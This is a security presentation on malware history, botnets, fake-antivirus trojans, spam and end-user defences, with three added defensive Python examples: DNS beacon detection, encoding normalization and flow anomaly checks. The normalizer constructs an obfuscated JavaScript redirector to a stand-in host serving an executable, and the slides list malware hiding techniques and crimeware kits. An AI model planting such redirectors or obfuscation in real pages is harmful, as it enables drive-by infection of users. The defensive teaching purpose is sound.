2. Presenter BIO
Roger A. Grimes
CPA, CISSP, CEH, CISA, TICSA, MCSE: Security, yada, yada
InfoWorld Contributing Editor, Security Columnist, Product
Reviewer, and Blogger
23-year Windows security consultant, instructor, and author
Author of seven books on computer security, including:
Windows Vista Security: Securing Vista Against
Malicious Attacks (Wiley, 2007)
Professional Windows Desktop and Server Hardening
(Dec. 2005)
Malicious Mobile Code: Virus Protection for Windows
(O’Reilly, 2001)
Honeypots for Windows (Apress, December 2004)
Author of over 300 national magazine articles on computer
security
Principal Security Architect for Microsoft InfoSec ACE Team
4. Presentation Summary
Quick History of Past Malware Threats
Today's Threats
Anatomy of Today's Cyber Attack
Malware Examples
Best Defenses
5. Malware Has Been Around Since The Beginning of
Computers
Most early malware were network worms
Late 1960s – John Conway’s Game of Life, Core Wars, Imp
1971, Creeper worm was written by Bob Thomas of the
BBN (Bulletin Board Network)
(First PC, Altair 8800, 1974)
IBM Christmas worm –Dec. 1987
Robert Morris Worm –Nov. 1988
Historic Malware Trends
6. (Apple computer invented 1976)
1982 – Richard Skrenta, Jr., a 9th-grade high school
student and Core War fan, wrote a 400-line Apple II boot
virus called Elk Cloner
Spread around the world
Every 50th boot would present message
No virus scanners or cleaners at this time
(IBM PC introduced in late 1981)
1986 – Pakistani Brain – first IBM-compatible virus
1987 – Stoned, Jerusalem, Cascade (encrypted), Lehigh
Historic Malware Trends
First PC Viruses – Boot Viruses
7. Boot Viruses
Even though they made up just a few percent of the
malware programs, they accounted for most of the
infections
March 1992 – Michelangelo
Executable Viruses
Some Trojan Horse Programs
Some Worms, but not many
Most malware programs were not intentionally
malicious
Historic Malware Trends
Early PC Malware
8. 1985 – Macro viruses
1998 – HTML viruses
2001 – Code Red – IIS worm
2003 – SQL Slammer
Fastest exploit to date – 10 minutes to infect world
2003 – MS Blaster
In 99.9999% of cases, patch was available before exploit
was released
Historic Malware Trends
PC Malware Hits Mainstream
9. From 1999 to late 2006, about 90% of malware attacks
arrived via email
VBScript, Javascript
Malicious file attachments
Rogue embedded links
Spam
MIME-type mismatches
Social-engineering methods
Melissa, I love you worm
Historic Malware Trends
Email worms/viruses
10. Still, most were not intentionally malicious
Those were the days!
Historic Malware Trends
Email worms/viruses
11. Run an up-to-date antivirus program
Run a host-based firewall that prevents
unauthorized outbound connections
Be fully patched
Visit only trusted web sites
Be careful opening unexpected documents
Use other programs and OSs to remain safe
Current Malware Trends
Conventional Defense Wisdom
12. AV is not all that accurate and cannot be relied
upon
Host-based firewalls really don’t work most of
the time
Nobody fully patches
Trusted web sites are how you get infected
Many attacks work cross-platform or don’t care
about OS or app
Targeted spearphishing makes determining what
documents you should open hard to do
Current Malware Trends
Sadly...
13. Malware and hacking are worse than ever!
Even though we already do all the recommended
stuff
Current Malware Trends
Sadly...
14. Mostly trojans, worms, and downloaders
Professionally written
Development forks, teams
Criminally-motivated
Bots & botnets
Tens of millions of PCs “owned” at any one time
Designed To Get Money
Steal passwords, identity info, DDoS attacks
Mostly asks for permission to run and user responds
“YES”
Current Malware Landscape
New Malware Model
16. Cybercriminals are stealing tens of millions (at
least) of dollars every day
2009 Verizon Data Breach report found that 91
percent of all compromised records in 2008 were
attributed to organized criminal activity.
“On the brighter side, we are happy to report that these
efforts with law enforcement led to arrests in at least 15
cases.”
Current Malware Landscape
Criminally Motivated
17. 1. User visits “innocent” infected web site
2. Contains simple Javascript redirector
3. Prompts user to install fake program
Anti-virus scanner, patch, codec, malformed PDF, etc.
4. First program is a small downloader
Starts the malware process
Provides bot control
Dials home for more instructions
Current Malware Landscape
Most Common Malware Cycle
20. What has trusted ever meant anyway?
How do I know I can trust it?
Do those “seals of approval” mean anything?
Me, I feel safer on a pay-for-view porn site!!
Current Malware Landscape
Trusted Web Sites?
21. 77 percent of web sites with malicious code are
legitimate sites that have been compromised
61 percent of the top 100 sites either hosted
malicious content or contained a masked redirect to
lure unsuspecting victims to malicious
37 percent of malicious Web/HTTP attacks included
data-stealing code
57 percent of data-stealing attacks are conducted over
the Web
Current Malware Landscape
Innocently Infected Web Sites
22. How?
Web site itself compromised
Misconfiguration
Vulnerability
Allows user postings
Malicious ads from legitimate ad services
Malicious sponsored ads on search engines
Poisoned search engine results
Web site codelets created by bad guys to go
malicious one day
Current Malware Landscape
Innocently Infected Web Sites
23. Tens of Millions of Malicious Web Sites
Look real, but completely malicious
Often taken there by OS or app help program or
search engine
Promote product that is nothing but malicious
Have entire teams of people dedicated to promoting
product on “independent” blogs, review magazines,
etc.
Ex: You must have this codec to watch these car
racing videos on YouTube
Current Malware Landscape
Some aren’t so Innocent!
24. Poisoned Ad Services
You name the major web site and it has probably
hosted malicious ads
Ads posted by web site owner, marketing firm hired
by web site, compromised ad service, or hacking
Avast - the most compromised services are Yahoo’s
yieldmanager.com and Fox’s fimserve.com
Responsible for more than 50% of poisoned ads
Doubleclick.net too
http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/
Current Malware Landscape
Innocently Infected Web Sites
25. Poisoned Cartoons?
King Features, a newspaper comic distributor was
hacked
King Features distributes online comics to about 50
different newspapers
Online readers were prompted to download a
malicious PDF
http://voices.washingtonpost.com/securityfix/2009/12/hackers_exploit_adobe_reader_f.html
Current Malware Landscape
Innocently Infected Web Sites
26. Search Engine Poisoning
Bad guys create web sites that are very attractive to search
engine bot crawlers (e.g. lots of links with lots of
keywords)
It is not uncommon to find malicious links in 15% to 20%
of the first 100 results from a search
Some of the most popular searches will return 90%
Malicious web sites are often generated on the fly,
differing only by a single keyword in the URL
http://www.cyveillanceblog.com/general-cyberintel/malware-google-search-results
Current Malware Landscape
Innocently Infected Web Sites
27. SEO Kits
Poisoned search engine results often created by Search
Engine Optimization (SEO) kits
Kits download the most popular search engine requests from
the search engines themselves (e.g. Google Trends)
Then generate web site on the fly with those keywords
and images
Generates thousands of web sites with those keywords
and link to each other
http://www.sophos.com/sophos/docs/eng/papers/sophos-seo-insights.pdf
Current Malware Landscape
Innocently Infected Web Sites
28. Sponsored Ads
Search engines often host sponsored ads that redirect to
malicious sites and code
Nearly all search engines involved
Certainly the ones you use are
Due to malware companies posing as legitimate
companies and switching up ads, or legitimate web sites
that paid for legitimate ad time being infected
Current Malware Landscape
Innocently Infected Web Sites
30. Many Infected Host Providers Are Slow To
Respond
Example: ThePlanet.com
Stopbadware.org notifies ThePlanet when they note
an infected web site hosted by ThePlanet
Averages 12K-20K infected sites a month
1 month after reporting, 12K of reported web sites
remain infected
4.5K remain infected after 7 months
Current Malware Landscape
Innocently Infected Web Sites
31. Bulletproof Hosting
Many companies advertise on the promise that they
will keep your web site up no matter what you do
with it
The Russian Business Network is number one in this
space
McColo was #2 before 2008 takedown
Plenty of competition
Located in countries without appropriate laws
Current Malware Landscape
Not-So Innocently Infected Web Sites
34. Diagram nodes: Dynamic DNS Server, Initial Mothership, Web Server, Dynamic Mothership
1. Bot program exploits victim PC and installs itself
2. It “phones home” using dynamic DNS server to find “mothership”
3. Finds mothership, downloads new code and instructions
4. Repeats 1-20 times
5. Infects new victim PCs
6. Sometimes plays role of bot host, sometimes of dynamic DNS server, sometimes mothership
Diagram annotations:
- Created for just this single victim instance
- Can be a legitimate DNS server or exploited system
- Usually just another exploited victim or web server
- Updates dynamic DNS server with current IP address
- Mothership updates may cycle 20 times
- Sends bot host new programs, new payload, new instructions
Current Malware Landscape
New Malware Model Steps
35. 1. Infect or Exploit
2. Modify system to gain control
3. Phone “home” to get code update
Repeat this step 1-20 times
4. Modify host and spread to create bot net
5. Steal information: financial, passwords, etc.
6. Able to bypass any authentication method
7. When finished, self-delete, cover up tracks
Current Malware Landscape
New Malware Model Steps
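An added example, not from the presentation, of how a defender can look for the dynamic-DNS behaviour in steps 2-4 above in resolver logs: a name whose answer IP keeps changing under a short TTL, and a client that queries it at machine-regular intervals. The log lines, hostnames and thresholds are constructed for illustration.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed resolver log (not from the presentation), one query per line:
# "<epoch-seconds> <client-ip> <queried-name> <answer-ip> <ttl-seconds>"
SAMPLE_DNS_LOG = """\
1000 10.0.0.5 www.example-news.test 203.0.113.10 3600
1060 10.0.0.5 www.example-news.test 203.0.113.10 3600
1120 10.0.0.7 upd.cycle-c2.test 198.51.100.2 60
1180 10.0.0.7 upd.cycle-c2.test 198.51.100.9 60
1240 10.0.0.7 upd.cycle-c2.test 192.0.2.77 60
1300 10.0.0.7 upd.cycle-c2.test 198.51.100.14 60
1360 10.0.0.7 upd.cycle-c2.test 192.0.2.130 60
1420 10.0.0.9 cdn.example-static.test 203.0.113.50 300
1480 10.0.0.9 cdn.example-static.test 203.0.113.51 300
"""


def parse_dns_log(text):
    """Parse the space-separated log into (ts, client, name, answer_ip, ttl) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, name, ip, ttl = line.split()
        records.append((int(ts), client, name.lower().rstrip("."), ip, int(ttl)))
    return records


def flag_dynamic_names(records, min_distinct_ips=3, max_ttl=300):
    """Names whose answers keep changing under short TTLs: the "mothership
    updates dynamic DNS with its current IP" pattern. Returns {name: (ips, min_ttl)}."""
    ips = defaultdict(set)
    min_ttl = {}
    for _, _, name, ip, ttl in records:
        ips[name].add(ip)
        min_ttl[name] = min(ttl, min_ttl.get(name, ttl))
    return {name: (len(seen), min_ttl[name])
            for name, seen in ips.items()
            if len(seen) >= min_distinct_ips and min_ttl[name] <= max_ttl}


def flag_beacons(records, min_queries=4, max_jitter=0.1):
    """(client, name) pairs queried at a near-constant interval: the bot's
    periodic "phone home". Returns {(client, name): interval_seconds}."""
    times = defaultdict(list)
    for ts, client, name, _, _ in records:
        times[(client, name)].append(ts)
    beacons = {}
    for key, stamps in times.items():
        if len(stamps) < min_queries:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        # Low relative spread of the gaps means machine-regular timing.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[key] = round(avg)
    return beacons


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_DNS_LOG)
    print("high-churn names:", flag_dynamic_names(recs))
    print("beaconing clients:", flag_beacons(recs))
```

Legitimate CDNs also rotate addresses, so the churn check is a triage signal to combine with the beacon check and with which clients are asking, not a verdict on its own.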
36. Self-healing bot nets
Intended to live only a few hours
Auto-updating
Designed To Hide
Millions of malicious links on social networking
sites
Some of the biggest users of Facebook, Myspace, and
Twitter
Current Malware Landscape
New Malware Model (cont’d)
37. Silent drive-by downloads and “one click and you’re
owned” traps used to be the way people got infected
Require unpatched software and vulnerabilities
UAC and other browser protections make this harder to
do
Still happens, but now in the minority
OS patching is nearly 100% now
App patching could be better
Malware writers are mostly targeting unpatched
Internet browser apps now
Current Malware Landscape
New Malware Model (cont’d)
38. In most cases, people are tricked into intentionally
installing a malware program
99% of the risk in most environments
Occasionally, a roving worm, like Conficker, becomes Ms.
Popularity for a few days or months
Current Malware Landscape
New Malware Model (cont’d)
39. Vulnerabilities trending down since 1H 2007
Current Malware Landscape
Known Vulnerabilities Going Down Year-after-Year
Figures for all reporting vendors
40. Even OS and Browser Vulnerabilities Are Flat
Current Malware Landscape
Known Vulnerabilities Going Down Year-after-Year
From MS SIR 8
41. Especially in the browser space
Every new browser vendor promises to make the
perfectly secure browser that apparently Microsoft
cannot seem to make
Later on I’ll tell you how it doesn’t matter at all
anyway
Current Malware Landscape
Still Plenty of Vulnerabilities
42. Firefox – 169
Apple Safari – 94
Internet Explorer – 45
Google Chrome – 41
Opera - 25
Current Malware Landscape
Number of Browser Vulnerabilities in 2009
From Symantec/Secunia
43. Firefox – 52
Firefox 3.0 – 15, 3.5 – 18, 3.6 – 19
Apple Safari 4 – 17
Internet Explorer 8 – 21
Google Chrome – 28
Opera – 6
Of all browsers Symantec analyzed in 2009, Safari had the longest window
of exposure (the time between the release of exploit code for a
vulnerability and a vendor releasing a patch), with a 13-day average; IE, FF,
and Opera had the shortest windows of exposure, avg 1 day.
Current Malware Landscape
Number of Browser Vulnerabilities in 2010 (so far)
44. The way almost all your users are getting
infected is direct action trojans
Current Malware Landscape
But Vulns Don’t Matter All That Much
45. By a huge percentage, trojans are number one!
Current Malware Landscape
Trojans Are #1!
(From Microsoft SIR 8)
(Chart: Exploits vs. Trojans)
47. Trojan program looks “really, really” authentic
Coming from legitimate web sites, spam, phishing
attacks
Bad guy often buys ads on search engines or “poisons”
search engine results
Certain keywords are more likely to bring up malware
than legitimate web sites
Bad guys use the latest news (e.g. earthquake, celebrity
event, etc.)
Often accidentally redirected to malware sites by
legitimate trusted software
Why Are They So Prevalent?
49. In one year, Google found over 11,000 web sites
offering fake AV scanners
1,462 unique new installer programs per day
20% detection rate by real AV
1 hr – median time redirection web site is up before
hackers move on
In SIR 8, Microsoft said its security products cleaned
fake anti-virus related malware from 7.8 million
computers in the second half of 2009.
Fake AV Stats – from Google
51. Millions of new programs created every year
Challenging for pure definition scanners to keep up
No antivirus scanner will ever be perfect
Check out http://www.virustotal.com/estadisticas.html
Why Are They So Prevalent?
52. “Zero-day” exploits becoming more common
One attack program can have 20 exploit vectors
DNS tricks
Poisoning, hosts file manipulation
Sound-alikes
One-offs (everything unique for each victim)
Millions of malware programs each year
Symantec reported 2.8 M malware programs in 09
More than legitimate programs
Current Malware Landscape
Infection or Exploit
53. Known Malware Detection Rates Not Bad
www.virusbulletin.com
Dozens of AV scanners routinely detect 100% of the
known malware programs in the wild with zero false-
positives
Awarded VB100
Why Are They So Prevalent?
Malware Is Hiding Better
54. First-Day Malware Detection Rates Could Be Improved
www.av-test.org (Dec. 2009)
Brand new threats were released and tested
Best products detected malware 98% of the time, blocked
95% of the time
Average product was 70-90% effective
Sounds good until you realize that out of 100 users in
your network, at least two of them will be presented with
a trojan program that is not detected as malicious
Now multiply that by the size of your user base, especially
over time
Why Are They So Prevalent?
Malware Is Hiding Better
55. How Does Malware Hide?
Early Techniques:
Encrypted – hide the malware so it can’t be scanned
Oligomorphic – multiple encryption/decryption engines
Polymorphic – random encryption/decryption
Metamorphic – mutates malware body, looks for compiler
on host and re-compiles malware on-the-fly
Why Are They So Prevalent?
Malware Is Hiding Better
56. How Does Malware Hide?
Today’s Techniques:
HTML Encoding/Obfuscation
Character set (e.g. UTF-8, UTF-7, Unicode) encoding
Compression (e.g. multi-compressed zip files)
Packers, Multi-packers
SSL/TLS/encryption for travel and communications
Why Are They So Prevalent?
New Malware Is Hiding Even Better
57. How Does Malware Hide?
Today’s Techniques:
Language encoding (e.g. simplified Chinese)
Transfer encoding (e.g. chunked, token-extension)
Packet fragmentation, time-outs
Password protected files
Embedded code (e.g. RTF links)
Embedded in thick content (e.g. PDF, Flash, MS-Office
objects)
Why Are They So Prevalent?
New Malware Is Hiding Even Better
58. How Does Malware Hide?
Today’s Techniques:
Dynamic DNS names
Dynamic IP addressing
One-time URLs (unique per victim)
Self-deleting malware
Delete and come back when needed
Why Are They So Prevalent?
New Malware Is Hiding Even Better
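An added example, not from the presentation, of why the encoding and compression layers listed on the last three slides defeat a scanner that only matches the raw bytes: a normalizer that peels HTML entities, percent-encoding, base64 and gzip until nothing changes, then matches signatures on the result. The redirector string, the indicator strings and the sample domain are constructed for illustration.

```python
import base64, binascii, gzip, html, re
from urllib.parse import quote, unquote

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Constructed indicator strings (hypothetical; not from the presentation).
SIGNATURES = ["window.location=", "install-codec.exe"]

def try_gzip(s):
    raw = s.encode("latin-1", "replace")        # latin-1 keeps bytes 1:1 in str
    if not raw.startswith(b"\x1f\x8b"):
        return None
    try:
        return gzip.decompress(raw).decode("latin-1")
    except (OSError, EOFError):
        return None

def try_html(s):
    out = html.unescape(s)
    return out if out != s else None

def try_percent(s):
    out = unquote(s)
    return out if out != s else None

def try_base64(s):
    compact = "".join(s.split())
    if len(compact) < 16 or len(compact) % 4 or not B64_RE.match(compact):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    # Accept only gzip output or mostly printable text, so plain words are not "decoded".
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    if raw.startswith(b"\x1f\x8b") or printable >= 0.9 * len(raw):
        return raw.decode("latin-1")
    return None

# Tried in this order on every pass until no decoder changes the sample.
DECODERS = [("gzip", try_gzip), ("html-entities", try_html),
            ("percent", try_percent), ("base64", try_base64)]

def normalize(sample, max_layers=10):
    """Peel encodings layer by layer; returns (plain_text, names_of_layers_removed)."""
    layers, current = [], sample
    for _ in range(max_layers):
        for name, fn in DECODERS:
            out = fn(current)
            if out is not None:
                layers.append(name)
                current = out
                break
        else:
            break
    return current, layers

def scan(sample):
    """Signature hits on the raw sample versus on its normalized form."""
    decoded, layers = normalize(sample)
    return {"raw_hits": [s for s in SIGNATURES if s in sample],
            "decoded_hits": [s for s in SIGNATURES if s in decoded],
            "layers": layers}

def build_sample():
    """Constructed input: a redirector string wrapped in gzip, base64,
    percent-encoding and HTML numeric entities (not a real-world sample)."""
    payload = 'window.location="http://bad.example.test/install-codec.exe"'
    b64 = base64.b64encode(gzip.compress(payload.encode())).decode()
    return quote(b64, safe="").replace("%", "&#37;")
```

Running `scan(build_sample())` shows no raw hits but both signatures after four layers are removed; the layer cap bounds the work an attacker can impose with deeply nested wrappers.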
59. Responsible for up to nearly 50% of all successful
web-based attacks.
Current Malware Landscape
Adobe Acrobat Malware Is a Huge Problem
61. Usually arrives in email
Sender has internal details
Most captured from company’s public web site and news
Other times, obviously has insider knowledge of project
or detail
Often target senior executives
Project document, pending lawsuit, child support inc.
Common scam: Target accounting to infect the payroll
transfer transaction computer
Defense: That computer should not be connected to the
normal network or used for anything else, highly guarded
and secured
Current Malware Landscape
Targeted Spearphishing
62. Can arrive in email
Current Malware Landscape
Adobe Acrobat Malware Example
63. Prompts User to Save Another “PDF” file
Current Malware Landscape
Adobe Acrobat Malware Example
64. Can be prevented by modifying one setting
Current Malware Landscape
Adobe Acrobat Malware Example
65. Most attacks several years old.
Current Malware Landscape
Do You Patch Office?
66. More than half (56.2 percent) of the attacks affected
Office program installations that had not been
updated since 2003.
Most of these attacks involved Office 2003 users who
had not applied a single service pack or other
security update since the original release of Office
2003 in October 2003.
Current Malware Landscape
Do You Patch Office?
67. CAN-SPAM Act of 2003 took down spam!
Current Malware Landscape
68. 25% - Percentage of spam when CAN-SPAM Act was
passed
Current Malware Landscape
Spam stats
69. Spam is most of our email
88% according to Symantec
93% according to MessageLabs
95 percent of user-generated comments to blogs, chat
rooms and message boards are spam or malicious.
(Websense 2009 report)
Spearphishing for targeted attacks increasing greatly
85% of spam is sent by bots from innocently infected
computers (Symantec)
20% of all spam sent in March 2010 used TLS
(MessageLabs)
Current Malware Landscape
Spam stats
70. Spammers bypass CAPTCHAs, by:
OCR – recognize the symbols
VCR – recognize the voice
Paying third world country employees to manually
answer
Freelancer.com - dozens of such projects are bid on
every week.
80 cents to $1.20 for each 1,000 deciphered boxes or
about $6 every 15 days for the average worker
Current Malware Landscape
Spammers Still Abusing Free Web Mail
71. Per MessageLabs
Hundreds of billions of spams are sent each day
85% from spambots, 90% from the top five bots
Rustock – largest current botnet with 2.4M hosts,
responsible for one third of all spam
Grum- Responsible for 24% of all spam
Mega-D – Responsible for 18% of all spam
Top spam bots vary according to measurer, but Rustock
always gets #1 spot
Current Malware Landscape
Bot Nets and Spam
73. Many commercial bot net kits
Management interfaces
24 x 7 tech support
Bypass any authentication
Made to order
Example: Butterfly/Mariposa bot net (March 2010)
13 million controlled computers in 190 countries
Run by three non-experts, required very little skill
Bought original bot kit for $300
Current Malware Landscape
Bot Nets
74. Crum – $200 – creates polymorphic encrypted
malware, free updates
Eleonore Exploits Pack – $700 – several exploits
including MS, Firefox, Opera, and PDF
Neon – $500 – PDFs (including FoxIt), Flash, Snapshot
Adrenaline – $3000 – keylogging, theft of digital
certificates, encryption of information, anti-detection
techniques, cleaning of fingerprints, injection of viral
code, etc.
http://malwareint.blogspot.com/2009/08/prices-of-russian-crimeware-part-2.html
Current Malware Landscape
Malware Kit Examples
76. For the most part, we aren’t catching many of the criminals
International jurisdictions, non-compliant countries, no hard
evidence, real crimefighting takes time
Users/admins not doing the simple things they should be
doing to stop malicious attacks
Attackers don’t need complex, hypervisor attacks to do
damage; current attacks doing just fine
Vendors could produce zero-defect software and it would
not make a measurable dent in cybercrime
Current Malware Landscape
Future Not Looking That Great
78. The most popular software in a particular
category will be successfully attacked the most
Grimes Corollary
Regardless of whether or not Microsoft made it!
Windows, IE, Microsoft Office
PDF over XPS
Apache over IIS
Quicktime over Windows Media Player
ActiveX over Java Applets
79. Auction/Sales Site scams
Selling a car or motorcycle for an unbelievable
price with unbelievable terms
“I’ll give you the best price ever and pay for
international shipping”
Send your money to a “trusted, third party”
“Buyer protection”
Doesn’t care what your OS or browser is
So much for your anti-malware programs
Current Malware Landscape
Many Times No Malware Needed
80. Auction Car Sale Scam Example
Current Malware Landscape
Many Times No Malware Needed
81. Auction Car Sale Example
Current Malware Landscape
Many Times No Malware Needed
82. Lessons To Take Away
Malware usually comes from innocently infected web sites
Visiting only “trusted” web sites is not great advice anymore
Consider investing more in technologies that can mitigate
these types of threats
Educate end users about the current state of malware
If we could educate users to not install fake programs, the
majority of the current malware threat would disappear
overnight
Current Malware Landscape
Forming a Defense
83. Best End-User Defenses
Don’t be logged in as Administrator or root when
surfing the web or reading email
Run up-to-date anti-malware programs
Antivirus, Firewalls, Anti-spam, Anti-phishing, intrusion
detection
Fully patch OS and all applications, including
browser add-ons (harder than it sounds)
Use good, secure defaults
Fight the Good Fight
84. Best End-User Defenses
Educate end-users about the most likely threats
Tell them to learn what their AV software looks like
and what it doesn’t
Show them what their patching software looks like
Tell them not to install software offered by their
favorite web site
Does your educational content contain this
information?
Phish your own users (be the first!)
Fight the Good Fight
85. Best End-User Defenses
Use search engines that contain anti-malware
abilities (e.g. Bing, Google, etc.)
Use browsers that have anti-malware checkers
Most of the popular ones, but not all
Look for unusual network traffic patterns
Unexpected large transfers, workstation-to-workstation,
server-to-server
Install honeypots as early warning detectors
Fight the Good Fight
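An added example, not from the presentation, of the traffic-pattern check on the slide above run over flow records: it flags workstation-to-workstation connections, server-to-server pairs outside an allow-list, and unusually large transfers, and goes one step further by flagging a single workstation fanning out to several peers, the spread pattern of a bot building its net. The address plan, peer allow-list, threshold and flow lines are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed address plan and flow records (hypothetical; not from the presentation).
WORKSTATIONS = ipaddress.ip_network("10.1.0.0/16")
SERVERS = ipaddress.ip_network("10.2.0.0/16")
EXPECTED_SERVER_PEERS = {("10.2.0.10", "10.2.0.20")}   # e.g. web tier -> database
LARGE_TRANSFER_BYTES = 50_000_000

# "<ts> <src-ip> <dst-ip> <dst-port> <bytes>", one flow per line.
SAMPLE_FLOWS = """\
1 10.1.0.15 10.2.0.10 443 120000
2 10.1.0.15 10.1.0.22 445 3400000
3 10.2.0.10 10.2.0.20 1433 800000
4 10.2.0.20 10.2.0.30 22 5000
5 10.1.0.40 203.0.113.9 443 71000000
6 10.1.0.15 10.1.0.23 445 3100000
7 10.1.0.15 10.1.0.24 445 2900000
"""

def parse_flows(text):
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, port, nbytes = line.split()
            flows.append((int(ts), src, dst, int(port), int(nbytes)))
    return flows

def classify(ip):
    addr = ipaddress.ip_address(ip)
    if addr in WORKSTATIONS:
        return "workstation"
    if addr in SERVERS:
        return "server"
    return "external"

def find_anomalies(flows, fanout_threshold=3):
    """Flag the patterns the slide names, plus one workstation fanning out to
    several peers (the worm-style spread of a bot building its net)."""
    alerts = []
    peers = defaultdict(set)
    for ts, src, dst, port, nbytes in flows:
        kinds = classify(src), classify(dst)
        if kinds == ("workstation", "workstation"):
            alerts.append({"ts": ts, "kind": "workstation-to-workstation",
                           "src": src, "dst": dst, "port": port})
            peers[src].add(dst)
        elif kinds == ("server", "server") and (src, dst) not in EXPECTED_SERVER_PEERS:
            alerts.append({"ts": ts, "kind": "unexpected server-to-server",
                           "src": src, "dst": dst, "port": port})
        if nbytes >= LARGE_TRANSFER_BYTES:
            alerts.append({"ts": ts, "kind": "large transfer",
                           "src": src, "dst": dst, "bytes": nbytes})
    for src, dsts in peers.items():
        if len(dsts) >= fanout_threshold:
            alerts.append({"ts": None, "kind": "lateral fan-out",
                           "src": src, "peers": sorted(dsts)})
    return alerts

if __name__ == "__main__":
    for alert in find_anomalies(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

The allow-list and the byte threshold are the tuning knobs: management hosts and backup jobs need to be added to them before the output is quiet enough to act on.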
86. Future Defenses
Most countries are starting to work together better
(although very slowly)
Ultimately will take rebuilding the Internet
Building in pervasive identity and accountability
Still support anonymity
Will have to be done incrementally
Support End-to-End Trust initiatives
All needed protocols are already in place
See Trusted Computing Group’s work
Microsoft’s End To End Trust
Current Malware Landscape
Forming a Defense